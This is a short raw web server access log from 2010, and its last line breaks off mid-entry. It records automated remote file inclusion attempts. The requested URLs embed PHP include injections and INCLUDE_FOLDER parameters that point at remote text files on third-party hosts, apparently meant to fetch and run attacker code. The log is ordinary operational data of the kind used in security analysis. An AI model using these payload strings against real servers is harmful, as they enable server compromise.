222.109.127.201 - - [25/Feb/2010:10:25:09 -0800] "GET /logs/access_100201.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:10:25:16 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:10:25:16 -0800] "GET /logs/access_100219.log%20%20/?INCLUDE_FOLDER=http://